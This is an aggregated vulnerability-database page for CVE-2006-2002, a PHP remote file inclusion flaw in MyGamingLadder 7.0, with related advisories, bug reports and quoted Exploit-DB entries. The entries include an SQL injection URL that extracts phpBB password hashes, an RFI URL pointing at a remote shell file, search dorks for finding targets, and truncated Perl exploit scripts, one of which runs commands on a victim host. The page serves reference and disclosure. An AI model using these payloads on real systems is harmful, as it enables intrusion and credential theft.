CVE-2006-2002
published 2006-04-25CVE-2006-2002: PHP remote file inclusion vulnerability in stats.php in MyGamingLadder 7.0 allows remote attackers to execute arbitrary PHP code via a URL in the dir[base]…
PriorityP333medium5CVSS 2.0
AVNACLAuNCNIPAN
EXPLOIT
EPSS
2.88%
85.1th percentile
PHP remote file inclusion vulnerability in stats.php in MyGamingLadder 7.0 allows remote attackers to execute arbitrary PHP code via a URL in the dir[base] parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mygamingladder | mygamingladder | — | — |
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:P/A:N
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2h5q-c5qh-j6jr: PHP remote file inclusion vulnerability in stats
ghsa_unreviewed·2022-05-01
CVE-2006-2002 [MEDIUM] GHSA-2h5q-c5qh-j6jr: PHP remote file inclusion vulnerability in stats
PHP remote file inclusion vulnerability in stats.php in MyGamingLadder 7.0 allows remote attackers to execute arbitrary PHP code via a URL in the dir[base] parameter.
GHSA
Apache Tomcat Default Installation Reveals Sensitive Information
ghsa·2022-04-30
CVE-2002-2006 [LOW] Apache Tomcat Default Installation Reveals Sensitive Information
Apache Tomcat Default Installation Reveals Sensitive Information
The default installation of Apache Tomcat 4.0 through 4.1 and 3.0 through 3.3.1 allows remote attackers to obtain the installation path and other sensitive system information via the (1) SnoopServlet or (2) TroubleShooter example servlets.
Citrix
Citrix Workspace app for Windows Security Update
vendor_citrix·2020-09-08·CVSS 8.8
CVE-2020-8207 [HIGH] Citrix Workspace app for Windows Security Update
Citrix Workspace app for Windows Security Update
of Problem A vulnerability has been identified in the automatic update service of Citrix Workspace app for Windows that could result in: A local user escalating their privilege level to that of an administrator on the computer running Citrix Workspace app for Windows. A remote compromise of the computer running Citrix Workspace app when Windows file sharing (SMB) is enabled. The issue has the following identifier: CVE-2020-8207 This vulnerability affects the following supported versions of Citrix Workspace app for Windows: Citrix Workspace app 2002, 2006 and 2006.1 for Windows Citrix Workspace app 1912 LTSR for Windows (before CU1 Hotfix 1) Note that this vulnerability was originally reported against a subset of the versions above. However,
Red Hat
security flaw
vendor_redhat·2006-11-21·CVSS 5.0
CVE-2006-6097 [MEDIUM] security flaw
security flaw
GNU tar 1.16 and 1.15.1, and possibly other versions, allows user-assisted attackers to overwrite arbitrary files via a tar file that contains a GNUTYPE_NAMES record with a symbolic link, which is not properly handled by the extract_archive function in extract.c and extract_mangle function in mangle.c, a variant of CVE-2002-1216.
Statement: Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.
Red Hat
security flaw
vendor_redhat·2006-04-24·CVSS 7.5
CVE-2006-1990 [HIGH] security flaw
security flaw
Integer overflow in the wordwrap function in string.c in PHP 4.4.2 and 5.1.2 might allow context-dependent attackers to execute arbitrary code via certain long arguments that cause a small buffer to be allocated, which triggers a heap-based buffer overflow in a memcpy function call, a different vulnerability than CVE-2002-1396.
No detection rules found.
Exploit-DB
Fully Modded phpBB - 'kb.php' SQL Injection
exploitdb·2008-03-12
CVE-2008-1350 Fully Modded phpBB - 'kb.php' SQL Injection
Fully Modded phpBB - 'kb.php' SQL Injection
---
# Powered by phpBB © 2001, 2006 phpBB Group
# Modified by Fully Modded phpBB © 2002, 2006
#
#########################################################################
#
# AUTHOR : TurkishWarriorr
#
# HOME : http://www.1923turk.org
#
#########################################################################
#
# DORKS 1 : allinurl :kb.php?mode=article&k
# DORKS 2 : article&k=
# DORKS 3 : "Powered by phpBB © 2001, 2006 phpBB Group" "Modified by Fully Modded phpBB © 2002, 2006"
#
##########################################################################
EXPLOIT :
kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),username,char(58),user_password),4,5,6,7,8,9,10,11,12,13+from+phpbb_users+where+user_id+=2&page_num=2&cat=1
#####
Exploit-DB
Socketmail 2.2.8 - 'fnc-readmail3.php' Remote File Inclusion
exploitdb·2007-10-22
CVE-2007-5627 Socketmail 2.2.8 - 'fnc-readmail3.php' Remote File Inclusion
Socketmail 2.2.8 - 'fnc-readmail3.php' Remote File Inclusion
---
Vulnerability Type: Remote File Inclusion
Vulnerable file: /mail/content/fnc-readmail3.php
Exploit URL: http://localhost/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: __SOCKETMAIL_ROOT
Line number: 399
Lines:
} else {
include_once($__SOCKETMAIL_ROOT."/content/fnc-readmail.std.php");
}
GrEeTs To sHaDoW sEcUrItY TeAm, str0ke
BiG sHoUt OuT tO udplink.net
FoUnD By BiNgZa
DoRk:"Powered by SocketMail Lite version 2.2.8. Copyright © 2002-2006"
DORK2: "Powered by SocketMail"
[email protected]
shadow.php0h.com
# milw0rm.com [2007-10-22]
Exploit-DB
PMB Services 3.0.13 - Multiple Remote File Inclusions
exploitdb·2007-03-09
CVE-2007-1415 PMB Services 3.0.13 - Multiple Remote File Inclusions
PMB Services 3.0.13 - Multiple Remote File Inclusions
---
____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/
.OR.ID
ECHO_ADV_68$2007
[ECHO_ADV_68$2007] PMB Services
- - Invalid include function at opac_css/includes/author_see.inc.php :
--------------------opac_css/includes/author_see.inc.php------------------------
<?php
// +-------------------------------------------------+
// © 2002-2004 PMB Services / www.sigb.net [email protected] et contributeurs (voir www.sigb.net)
// +-------------------------------------------------+
// $Id: author_see.inc.php,v 1.32 2006/12/29 16:10:04 touraine37 Exp $
// affichage du detail pour un auteur
require_once($base_path.'/includes/templates
Exploit-DB
x-news 1.1 - 'users.txt' Remote Password Disclosure
exploitdb·2006-12-30
CVE-2002-1656 x-news 1.1 - 'users.txt' Remote Password Disclosure
x-news 1.1 - 'users.txt' Remote Password Disclosure
---
x-news 1.1 Password Disclosure Vulnerability
Affected Software: x-news 1.1
x-news Website: http://xqus.com
Bugfounder: bd0rk
Website: www.soh-crew.it.tt
Contact: bd0rk[at]hackermail.com
Greetings: str0ke, Perle, TheJT, ajann
[+]Exploit: http://[target]/[x_news_path]/news/db/users.txt
Showexample: |username|MD5-Hash|eMail|
# milw0rm.com [2006-12-30]
Exploit-DB
N/X WCMS 4.1 - 'nxheader.inc.php' Remote File Inclusion
exploitdb·2006-10-27
CVE-2006-5625 N/X WCMS 4.1 - 'nxheader.inc.php' Remote File Inclusion
N/X WCMS 4.1 - 'nxheader.inc.php' Remote File Inclusion
---
#!/usr/bin/php -q -d short_open_tag=on
| | \\\
| | | | | | \\ //----------------------->
| DEVIL TEAM - POLISH TEAM \\\/ http://www.rahim.webd.pl/
___________ .__ ._\_ __ .__ _____
\_ _____/__ _________ | | ____ |__|/ |_ |__| _____/ ____\____
| __)_\ \/ /\____ \| | / _ \| \ __\ | |/ \ __\/ _ \
| \> > |_( ) || | | | | \ | ( )
/_______ /__/\_ \| __/|____/\____/|__||__| |__|___| /__| \____/
| | | | | \\
| N/X 2002 Professional Edition Web CMS
|
| Greetings DragonHeart and all DEVIL TEAM Patriots :)
| | Leito - Leon - TomZen - Gelo - Ramzes - DMX - Ci2u - Larry
| | | @steriod - Drzewko - CrazzyIwan - ARCLITE - Rammstein - Adam
| | | | Kicaj - DeathSpeed - Arkadius - Michas - pepi - nukedclx
| | | SkD - MXZ - sysios - mIvus - wack
Exploit-DB
Zix Forum 1.12 - 'RepId' SQL Injection (2)
exploitdb·2006-09-17
CVE-2006-4612 Zix Forum 1.12 - 'RepId' SQL Injection (2)
Zix Forum 1.12 - 'RepId' SQL Injection (2)
---
#!/usr/bin/perl
###########################################
# ZIXForum
###########################################
# Google dork:
# intext:"ZIXForum 1.12 by: ZixCom 2002"
###########################################
use IO::Socket::INET;
usage() unless (@ARGV == 2);
$host = shift(@ARGV);
$dir = shift(@ARGV);
$dir = "\/$dir" if ($dir !~ /^\//);
$dir = "$dir\/" if ($dir !~ /\/$/);
$host =~ s/http:\/\///g;
$path = $dir.'ReplyNew.asp?RepId=-1%20UNION%20SELECT%20null,null,null,J_user,null,null,null,null,null,null,null,null%20FROM%20adminlogins';
$path2 = $dir.'ReplyNew.asp?RepId=-1%20UNION%20SELECT%20null,null,null,J_pass,null,null,null,null,null,null,null,null%20FROM%20adminlogins';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr
Exploit-DB
Sponge News 2.2 - 'sndir' Remote File Inclusion
exploitdb·2006-09-05
CVE-2006-4647 Sponge News 2.2 - 'sndir' Remote File Inclusion
Sponge News 2.2 - 'sndir' Remote File Inclusion
---
#==============================================================================================
#Sponge News <= v2.2 (sndir) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#Venedor site : http://rickeeweb.free.fr/spongeweb/
#
#Version : v2.2
#
#================================================================================================
#Bug in : news.php
#
#Vlu Code :
#--------------------------------
# ########################
# # Les variables utiles #
# ########################
# $newsdir = "news/";
# $commentdir = "comments/";
# $snversion = "2.2";
# $lastmodif = "Decembre 2002";
# $scriptdir = $sndir;
# $page = $curre
Exploit-DB
Microsoft Office 2000/2002 - Property Code Execution
exploitdb·2006-07-11·CVSS 9.3
CVE-2006-2389 [CRITICAL] Microsoft Office 2000/2002 - Property Code Execution
Microsoft Office 2000/2002 - Property Code Execution
---
source: https://www.securityfocus.com/bid/18911/info
Microsoft Office is prone to a code-execution vulnerability. This is due to a failure to handle exceptional conditions.
Successfully exploiting this issue allows attackers to corrupt process memory and to execute arbitrary code in the context of targeted users.
#Microsoft Office Property Code Execution exploit (CVE-2006-2389)
#Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com
#Web - http://www.aslitsecurity.com/
#Blog - http://www.aslitsecurity.blogspot.com/
#Vulnerble application MS office 2003
#Tested on XP SP2 - MS Ofice 2003
#Greets Mila http://contagiodump.blogspot.com, Villy and ASL IT SECURITY TEAM
#!/usr/bin/python
import sys
import zl
Exploit-DB
D-Link DWL Series Access-Point 2.10na - Config Disclosure
exploitdb·2006-06-08
CVE-2006-2901 D-Link DWL Series Access-Point 2.10na - Config Disclosure
D-Link DWL Series Access-Point 2.10na - Config Disclosure
---
# ADVISORY/0206 - D-Link Wireless Access-Point (DWL-2100ap)
# INTRUDERS TIGER TEAM SECURITY - SECURITY ADVISORY
# http://www.intruders.com.br/ , http://www.intruders.org.br/
Making a HTTP request to the /cgi-bin/ directory, the Web server will return error 404 (Page not found).
Making a HTTP request to the /cgi-bin/AnyFile.htm, the Web server will return error 404 (Page not found).
However, making a HTTP request to any file in /cgi-bin/ directory, with .cfg extension, will return all the device configuration.
For example, making the following request:
http://dlink-DWL-2100ap/cgi-bin/Intruders.cfg
We would have a result equivalent to the following:
# Copyright (c) 2002 Atheros Communications, Inc., All Rights Reserved
# DO
Exploit-DB
My Gaming Ladder Combo System 7.0 - Remote Code Execution
exploitdb·2006-04-22
CVE-2006-2002 My Gaming Ladder Combo System 7.0 - Remote Code Execution
My Gaming Ladder Combo System 7.0 - Remote Code Execution
---
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=28
#Usage: ladder.pl
#Dork: "Ladder Scripts by http://www.mygamingladder.com" 40.500 pages.
use IO::Socket;
if(@ARGV \r\n";
print "- -> Victim's host ex: www.victim.com\r\n";
print "- -> Path to My Gaming Ladder ex: /ladder/\r\n";
print "- -> Command to execute ex: ls -la\r\n";
print "- This exploit needs allow_url_fopen set to 1 and register_globals on\r\n";
exit();
}
sub exploit ()
{
#Our variables...
$echoing = "";
$ldserver = $ARGV[0];
$ldserver =~ s/(http:\/\/)//eg;
$ldhost = "http://".$ldserver;
$lddir = $ARGV[1];
$ldport = "80";
$ldtar = "sta
Exploit-DB
Microsoft Office Products - Array Index Bounds Error (PoC)
exploitdb·2006-03-27
CVE-2006-1540 Microsoft Office Products - Array Index Bounds Error (PoC)
Microsoft Office Products - Array Index Bounds Error (PoC)
---
# Full archive at https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1615.rar (excel_03262006.rar)
Topic : Microsoft Office 2002 - Excel/Powerpoint/Word.. 10.0.2614.0 => 11.0.5612.0
Date : 02/12/2006
Author : posidron
Table of Contens
- Some Excel Information
- The XLS File Format and Observation
- The XLW File Format and Observation
- Powerpoint and Word Dump Additions
- Conclusion
- References
Some Excel Information
- Microsoft Excel uses the BIFF (Binary Interchange File Format)
- in Excel 8.0 (Excel 97), BIFF8 was introduced
- in Excel 10.0 (Excel XP), BIFF8X was introduced
- Excel 97 and Excel 2000 can read BIFF8X, except new features added with Excel XP.
Since BIFF5, all data is saved
Exploit-DB
Apache Tomcat 4.0/4.1 - Servlet Full Path Disclosure
exploitdb·2002-04-23
CVE-2002-2006 Apache Tomcat 4.0/4.1 - Servlet Full Path Disclosure
Apache Tomcat 4.0/4.1 - Servlet Full Path Disclosure
---
source: https://www.securityfocus.com/bid/4575/info
Apache Tomcat is a servlet container for use with the Java Servlet and JavaServer Pages technologies. Tomcat may be run on most UNIX and Linux variants as well as Microsoft Windows.
Apache Tomcat ships with a number of example classes (SnoopServlet and TroubleShooter) that may reveal the absolute path of the Tomcat installation when requested.
Disclosure of this type of sensitive information may aid in further attacks against the host running the vulnerable software.
http://localhost:8080/examples/servlet/SnoopServlet
http://localhost:8080/examples/servlet/TroubleShooter
Bugzilla
CVE-2006-1990 security flaw
bugzilla·2018-08-16·CVSS 7.5
CVE-2006-1990 [HIGH] CVE-2006-1990 security flaw
CVE-2006-1990 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Integer overflow in the wordwrap function in string.c in PHP 4.4.2 and 5.1.2 might allow context-dependent attackers to execute arbitrary code via certain long arguments that cause a small buffer to be allocated, which triggers a heap-based buffer overflow in a memcpy function call, a different vulnerability than CVE-2002-1396.
Bugzilla
CVE-2006-6097 security flaw
bugzilla·2018-08-16·CVSS 5.0
CVE-2006-6097 [MEDIUM] CVE-2006-6097 security flaw
CVE-2006-6097 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
GNU tar 1.16 and 1.15.1, and possibly other versions, allows user-assisted attackers to overwrite arbitrary files via a tar file that contains a GNUTYPE_NAMES record with a symbolic link, which is not properly handled by the extract_archive function in extract.c and extract_mangle function in mangle.c, a variant of CVE-2002-1216.
---
Statement:
Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.
Bugzilla
A number of tomcat issues
bugzilla·2007-05-09·CVSS 5.0
CVE-2005-3164 [MEDIUM] A number of tomcat issues
A number of tomcat issues
A number of issues affected tomcat 4.0.6 as distributed with Stronghold. Most
of these are minor severity, all need triaging:
http://tomcat.apache.org/security-4.html
Information disclosure CVE-2005-3164
Information disclosure CVE-2005-2090
Directory traversal CVE-2007-0450
Cross-site scripting CVE-2007-1358
Cross-site scripting CVE-2006-7196
Directory listing CVE-2006-3835
Cross-site scripting CVE-2005-4838
Denial of service CVE-2005-3510
Denial of service CVE-2003-0866
Information disclosure CVE-2002-2006
Discussion:
closing; Stronghold has reached end of life.
Bugzilla
CVE-2002-2214 php imap To header buffer overflow
bugzilla·2006-06-15·CVSS 5.0
CVE-2002-2214 [MEDIUM] CVE-2002-2214 php imap To header buffer overflow
CVE-2002-2214 php imap To header buffer overflow
This upstream bug:
http://bugs.php.net/bug.php?id=15595
describes a buffer overflow that occurs when the php imap functions are used to
view a malformed message.
There is a patch in attachment 130838
Discussion:
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2006-0567.html
Bugzilla
Multiple tar issues (CVE-2005-1918, CVE-2006-0300)
bugzilla·2006-03-02·CVSS 5.0
CVE-2005-1918 [MEDIUM] Multiple tar issues (CVE-2005-1918, CVE-2006-0300)
Multiple tar issues (CVE-2005-1918, CVE-2006-0300)
There are two separate issues that affect different subsets of our products.
I. RHL 7.3, RHL 9, FC1 & FC2: tar archive path traversal issue
CVE-2005-1918: "The original patch for a GNU tar directory traversal
vulnerability (CVE-2002-0399) in Red Hat Enterprise Linux 3 and 2.1 uses
an 'incorrect optimization' that allows user-complicit attackers to over-
write arbitrary files via a crafted tar file, probably involving '/../'
sequences with a leading '/'."
This vulnerability appears to only affect tar-1.13.25 releases, which
these four distros use.
Red Hat issued RHSA-2006:0195-01 for RHEL 2.1 and RHEL 3:
"In 2002, a path traversal flaw was found in the way GNU tar extracted
archives. A malicious user could create a tar archive that cou
http://secunia.com/advisories/19773http://www.nukedx.com/?viewdoc=28http://www.osvdb.org/24892http://www.securityfocus.com/archive/1/431902/100/0/threadedhttp://www.securityfocus.com/bid/17657http://www.vupen.com/english/advisories/2006/1483https://exchange.xforce.ibmcloud.com/vulnerabilities/25992http://secunia.com/advisories/19773http://www.nukedx.com/?viewdoc=28http://www.osvdb.org/24892http://www.securityfocus.com/archive/1/431902/100/0/threadedhttp://www.securityfocus.com/bid/17657http://www.vupen.com/english/advisories/2006/1483https://exchange.xforce.ibmcloud.com/vulnerabilities/25992
2006-04-25
Published